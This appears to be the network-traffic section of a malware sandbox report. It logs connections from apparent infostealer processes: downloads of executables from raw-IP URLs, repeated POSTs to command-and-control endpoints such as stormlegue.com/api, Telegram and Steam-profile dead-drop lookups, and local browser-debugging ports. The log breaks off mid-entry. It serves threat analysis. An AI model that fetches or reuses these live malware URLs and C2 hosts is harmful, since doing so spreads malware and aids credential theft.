                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/vcruntime140.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 127.0.0.1:9229
                                                                                              ee1401f004.exe
                                                                                            • 127.0.0.1:9229
                                                                                              ee1401f004.exe
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 149.154.167.220:443
                                                                                              api.telegram.org
                                                                                              tls
                                                                                              trano1221.exe
                                                                                              1.4kB
                                                                                               7.5kB
                                                                                               12
                                                                                              12
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.2kB
                                                                                               951 B
                                                                                               12
                                                                                              15
                                                                                            • 195.228.152.90:80
                                                                                              http://elviscomputer.hu/wp-content/uploads/2021/01/engine.php
                                                                                              http
                                                                                              powershell.exe
                                                                                              686 B
                                                                                               8.9kB
                                                                                               5
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST http://elviscomputer.hu/wp-content/uploads/2021/01/engine.php

                                                                                              HTTP Response

                                                                                              403
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 163.70.151.63:443
                                                                                              i.instagram.com
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.4kB
                                                                                               8.9kB
                                                                                               14
                                                                                              17
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 104.82.234.109:443
                                                                                              https://steamcommunity.com/profiles/76561199822375128
                                                                                              tls, http
                                                                                              c6a31d1295.exe
                                                                                              1.4kB
                                                                                               43.4kB
                                                                                               19
                                                                                              37

                                                                                              HTTP Request

                                                                                              GET https://steamcommunity.com/profiles/76561199822375128

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 149.154.167.99:443
                                                                                              t.me
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.7kB
                                                                                               18.8kB
                                                                                               17
                                                                                              25
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              con12312211221.exe
                                                                                              3.9kB
                                                                                               12.0kB
                                                                                               18
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              c6a31d1295.exe
                                                                                              3.8kB
                                                                                               11.7kB
                                                                                               16
                                                                                              20

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 142.250.27.27:25
                                                                                              smtp.google.com
                                                                                              powershell.exe
                                                                                              260 B
                                                                                               5
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              con12312211221.exe
                                                                                              2.3kB
                                                                                               5.1kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              c6a31d1295.exe
                                                                                              2.2kB
                                                                                               4.9kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              con12312211221.exe
                                                                                              1.2kB
                                                                                               5.1kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              c6a31d1295.exe
                                                                                              1.2kB
                                                                                               4.8kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.215.113.97:80
                                                                                              http://185.215.113.97/files/FuckMAIN/monthdragon.exe
                                                                                              http
                                                                                              futors.exe
                                                                                              4.7kB
                                                                                               364.1kB
                                                                                               101
                                                                                              263

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.97/files/FuckMAIN/monthdragon.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              monthdragon.exe
                                                                                              3.9kB
                                                                                               12.0kB
                                                                                               17
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              monthdragon.exe
                                                                                              2.2kB
                                                                                               5.2kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              monthdragon.exe
                                                                                              1.2kB
                                                                                               5.1kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.0kB
                                                                                               911 B
                                                                                               10
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               951 B
                                                                                               12
                                                                                              15
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.0kB
                                                                                               911 B
                                                                                               10
                                                                                              14
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 149.154.167.99:443
                                                                                              t.me
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.5kB
                                                                                               7.2kB
                                                                                               12
                                                                                              15
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 142.250.178.14:443
                                                                                              https://play.google.com/log?hasfast=true&authuser=0&format=json
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              2.8kB
                                                                                               8.6kB
                                                                                               16
                                                                                              19

                                                                                              HTTP Request

                                                                                              POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                                                                                            • 142.250.187.206:443
                                                                                              https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                                                                                              tls, http2
                                                                                              firefox.exe
                                                                                              1.5kB
                                                                                               8.9kB
                                                                                               16
                                                                                              21

                                                                                              HTTP Request

                                                                                              GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                                                                                            • 2.18.121.79:80
                                                                                              http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                                                                                              http
                                                                                              firefox.exe
                                                                                              9.0kB
                                                                                               506.3kB
                                                                                               178
                                                                                              366

                                                                                              HTTP Request

                                                                                              GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              alex12112.exe
                                                                                              3.9kB
                                                                                               12.0kB
                                                                                               18
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 74.125.105.7:443
                                                                                              https://r2---sn-aigl6ns6.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1740011681,&mh=R8&mip=212.102.63.147&mm=28&mn=sn-aigl6ns6&ms=nvh&mt=1740011292&mv=m&mvi=2&pl=24&rmhost=r5---sn-aigl6ns6.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r5---sn-aigl6ney.gvt1.com
                                                                                              tls, http
                                                                                              firefox.exe
                                                                                              315.7kB
                                                                                               14.9MB
                                                                                               5575
                                                                                              10705

                                                                                              HTTP Request

                                                                                              GET https://r2---sn-aigl6ns6.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1740011681,&mh=R8&mip=212.102.63.147&mm=28&mn=sn-aigl6ns6&ms=nvh&mt=1740011292&mv=m&mvi=2&pl=24&rmhost=r5---sn-aigl6ns6.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r5---sn-aigl6ney.gvt1.com

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 149.154.167.99:443
                                                                                              t.me
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.5kB
                                                                                               7.2kB
                                                                                               13
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.156.73.73:80
                                                                                              http://185.156.73.73/service
                                                                                              http
                                                                                              BitLockerToGo.exe
                                                                                              7.9kB
                                                                                               106.6kB
                                                                                               72
                                                                                              99

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/success?substr=mixfour&s=three&sub=non

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/info

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/update

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.156.73.73/service

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              alex12112.exe
                                                                                              2.3kB
                                                                                               5.2kB
                                                                                               11
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              alex12112.exe
                                                                                              1.2kB
                                                                                               5.1kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 149.154.167.99:443
                                                                                              telegram.org
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.7kB
                                                                                               13.5kB
                                                                                               16
                                                                                              21
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 172.67.192.178:443
                                                                                              https://blastikcn.com/api
                                                                                              tls, http
                                                                                              fher.exe
                                                                                              3.9kB
                                                                                               11.8kB
                                                                                               18
                                                                                              23

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               951 B
                                                                                               12
                                                                                              15
                                                                                            • 172.67.192.178:443
                                                                                              https://blastikcn.com/api
                                                                                              tls, http
                                                                                              fher.exe
                                                                                              2.2kB
                                                                                               4.9kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 172.67.192.178:443
                                                                                              https://blastikcn.com/api
                                                                                              tls, http
                                                                                              fher.exe
                                                                                              1.2kB
                                                                                               4.8kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 109.232.216.168:80
                                                                                              byaronia.com
                                                                                              powershell.exe
                                                                                              208 B
                                                                                               4
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 94.100.180.31:25
                                                                                              mxs.mail.ru
                                                                                              powershell.exe
                                                                                              208 B
                                                                                               4
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 185.7.214.51:425
                                                                                              powershell.exe
                                                                                              2.9kB
                                                                                               894 B
                                                                                               7
                                                                                              6
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              1.2kB
                                                                                               2.8kB
                                                                                               9
                                                                                              6

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.75:80
                                                                                              http://185.215.113.75/files/unique2/random.exe
                                                                                              http
                                                                                              futors.exe
                                                                                              92.3kB
                                                                                               4.1MB
                                                                                               1742
                                                                                              2932

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/unique2/random.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.5kB
                                                                                               1.1kB
                                                                                               15
                                                                                              13
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               911 B
                                                                                               11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.2kB
                                                                                               951 B
                                                                                               12
                                                                                              15
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               831 B
                                                                                               11
                                                                                              12
                                                                                            • 104.82.234.109:443
                                                                                              https://steamcommunity.com/profiles/76561199724331900
                                                                                              tls, http
                                                                                              BitLockerToGo.exe
                                                                                              1.4kB
                                                                                               36.9kB
                                                                                               18
                                                                                              33

                                                                                              HTTP Request

                                                                                              GET https://steamcommunity.com/profiles/76561199724331900

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                               831 B
                                                                                               11
                                                                                              12
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              1.7kB
                                                                                               509 B
                                                                                               5
                                                                                              6
                                                                                            • 8.8.8.8:53
                                                                                              g.bing.com
                                                                                              dns
                                                                                              56 B
                                                                                               148 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              g.bing.com

                                                                                              DNS Response

                                                                                              150.171.28.10
                                                                                              150.171.27.10

                                                                                            • 8.8.8.8:53
                                                                                              fruitfuvljourney.tech
                                                                                              dns
                                                                                              8827e2f2e3.exe
                                                                                              67 B
                                                                                               132 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              fruitfuvljourney.tech

                                                                                            • 8.8.8.8:53
                                                                                              nestlecompany.world
                                                                                              dns
                                                                                              d2YQIJa.exe
                                                                                              65 B
                                                                                               133 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              nestlecompany.world

                                                                                            • 8.8.8.8:53
                                                                                              hoyoverse.blog
                                                                                              dns
                                                                                              8827e2f2e3.exe
                                                                                              60 B
                                                                                               172 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              hoyoverse.blog

                                                                                              DNS Response

                                                                                              104.21.96.1
                                                                                              104.21.48.1
                                                                                              104.21.64.1
                                                                                              104.21.16.1
                                                                                              104.21.112.1
                                                                                              104.21.32.1
                                                                                              104.21.80.1

                                                                                            • 8.8.8.8:53
                                                                                              ecozessentials.com
                                                                                              dns
                                                                                              18b64e1917.exe
                                                                                              64 B
                                                                                               137 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              ecozessentials.com

                                                                                            • 8.8.8.8:53
                                                                                              api.ip.sb
                                                                                              dns
                                                                                              0f807048bd.exe
                                                                                              55 B
                                                                                               145 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              api.ip.sb

                                                                                              DNS Response

                                                                                              104.26.12.31
                                                                                              104.26.13.31
                                                                                              172.67.75.172

                                                                                            • 8.8.8.8:53
                                                                                              httpbin.org
                                                                                              dns
                                                                                              90ced29b15.exe
                                                                                              160 B
                                                                                               282 B
                                                                                               2
                                                                                              2

                                                                                              DNS Request

                                                                                              httpbin.org

                                                                                              DNS Request

                                                                                              httpbin.org

                                                                                              DNS Response

                                                                                              52.22.198.150
                                                                                              3.214.119.249
                                                                                              3.208.239.150
                                                                                              34.196.100.57

                                                                                            • 8.8.8.8:53
                                                                                              home.fivenn5sr.top
                                                                                              dns
                                                                                              90ced29b15.exe
                                                                                              174 B
                                                                                               226 B
                                                                                               2
                                                                                              2

                                                                                              DNS Request

                                                                                              home.fivenn5sr.top

                                                                                              DNS Request

                                                                                              home.fivenn5sr.top

                                                                                              DNS Response

                                                                                              185.72.145.179

                                                                                            • 8.8.8.8:53
                                                                                              friendseforever.help
                                                                                              dns
                                                                                              40e0b6ad21.exe
                                                                                              66 B
                                                                                               131 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              friendseforever.help

                                                                                            • 8.8.8.8:53
                                                                                              shiningrstars.help
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              64 B
                                                                                               129 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              shiningrstars.help

                                                                                            • 8.8.8.8:53
                                                                                              mercharena.biz
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              60 B
                                                                                               122 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              mercharena.biz

                                                                                            • 8.8.8.8:53
                                                                                              generalmills.pro
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              62 B
                                                                                               144 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              generalmills.pro

                                                                                            • 8.8.8.8:53
                                                                                              stormlegue.com
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              60 B
                                                                                               172 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              stormlegue.com

                                                                                              DNS Response

                                                                                              104.21.16.1
                                                                                              104.21.96.1
                                                                                              104.21.64.1
                                                                                              104.21.112.1
                                                                                              104.21.48.1
                                                                                              104.21.32.1
                                                                                              104.21.80.1

                                                                                            • 8.8.8.8:53
                                                                                              home.fivenn5sr.top
                                                                                              dns
                                                                                              90ced29b15.exe
                                                                                              174 B
                                                                                               226 B
                                                                                               2
                                                                                              2

                                                                                              DNS Request

                                                                                              home.fivenn5sr.top

                                                                                              DNS Request

                                                                                              home.fivenn5sr.top

                                                                                              DNS Response

                                                                                              185.72.145.179

                                                                                            • 8.8.8.8:53
                                                                                              impactsupport.world
                                                                                              dns
                                                                                              6ccbdd7074.exe
                                                                                              65 B
                                                                                               133 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              impactsupport.world

                                                                                            • 8.8.8.8:53
                                                                                              nestlecompany.world
                                                                                              dns
                                                                                              d2YQIJa.exe
                                                                                              65 B
                                                                                               133 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              nestlecompany.world

                                                                                            • 8.8.8.8:53
                                                                                              pasteflawwed.world
                                                                                              dns
                                                                                              6ccbdd7074.exe
                                                                                              64 B
                                                                                               96 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              pasteflawwed.world

                                                                                              DNS Response

                                                                                              104.21.86.17
                                                                                              172.67.214.11

                                                                                            • 8.8.8.8:53
                                                                                              fivenn5sr.top
                                                                                              dns
                                                                                              90ced29b15.exe
                                                                                              164 B
                                                                                               216 B
                                                                                               2
                                                                                              2

                                                                                              DNS Request

                                                                                              fivenn5sr.top

                                                                                              DNS Request

                                                                                              fivenn5sr.top

                                                                                              DNS Response

                                                                                              185.72.145.179

                                                                                            • 8.8.8.8:53
                                                                                              clients2.google.com
                                                                                              dns
                                                                                              chrome.exe
                                                                                              65 B
                                                                                               105 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              clients2.google.com

                                                                                              DNS Response

                                                                                              172.217.169.78

                                                                                            • 8.8.8.8:53
                                                                                              www.google.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              60 B
                                                                                               76 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              www.google.com

                                                                                              DNS Response

                                                                                              142.250.200.4

                                                                                            • 8.8.8.8:53
                                                                                              ogads-pa.googleapis.com
                                                                                              dns
                                                                                              chrome.exe
                                                                                              69 B
                                                                                               293 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              ogads-pa.googleapis.com

                                                                                              DNS Response

                                                                                              142.250.178.10
                                                                                              172.217.169.42
                                                                                              142.250.200.42
                                                                                              142.250.187.202
                                                                                              216.58.201.106
                                                                                              172.217.16.234
                                                                                              216.58.204.74
                                                                                              216.58.213.10
                                                                                              142.250.200.10
                                                                                              216.58.212.202
                                                                                              142.250.179.234
                                                                                              142.250.187.234
                                                                                              172.217.169.10
                                                                                              142.250.180.10

                                                                                            • 142.250.178.10:443
                                                                                              ogads-pa.googleapis.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              2.7kB
                                                                                               7.3kB
                                                                                               11
                                                                                              14
                                                                                            • 8.8.8.8:53
                                                                                              fivenn5sr.top
                                                                                              dns
                                                                                              90ced29b15.exe
                                                                                              164 B
                                                                                               216 B
                                                                                               2
                                                                                              2

                                                                                              DNS Request

                                                                                              fivenn5sr.top

                                                                                              DNS Request

                                                                                              fivenn5sr.top

                                                                                              DNS Response

                                                                                              185.72.145.179

                                                                                            • 8.8.8.8:53
                                                                                              play.google.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              61 B
                                                                                               77 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              play.google.com

                                                                                              DNS Response

                                                                                              142.250.178.14

                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              3.4kB
                                                                                               7.1kB
                                                                                               10
                                                                                              11
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              2.7kB
                                                                                               7.6kB
                                                                                               7
                                                                                              11
                                                                                            • 8.8.8.8:53
                                                                                              wildpadventures.tech
                                                                                              dns
                                                                                              9aiiMOQ.exe
                                                                                              66 B
                                                                                               131 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              wildpadventures.tech

                                                                                            • 8.8.8.8:53
                                                                                              microsoft.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              59 B
                                                                                               139 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              microsoft.com

                                                                                              DNS Response

                                                                                              20.112.250.133
                                                                                              20.231.239.246
                                                                                              20.70.246.20
                                                                                              20.236.44.162
                                                                                              20.76.201.171

                                                                                            • 224.0.0.251:5353
                                                                                              608 B
                                                                                               9
                                                                                            • 8.8.8.8:53
                                                                                              microsoft.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              59 B
                                                                                               113 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              microsoft.com

                                                                                            • 8.8.8.8:53
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              87 B
                                                                                               151 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              microsoft-com.mail.protection.outlook.com

                                                                                              DNS Response

                                                                                              52.101.8.49
                                                                                              52.101.42.0
                                                                                              52.101.40.26
                                                                                              52.101.11.0

                                                                                            • 8.8.8.8:53
                                                                                              rebeldettern.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                               135 B
                                                                                               1
                                                                                              1

                                                                                              DNS Request

                                                                                              rebeldettern.com

                                                                                            • 8.8.8.8:53
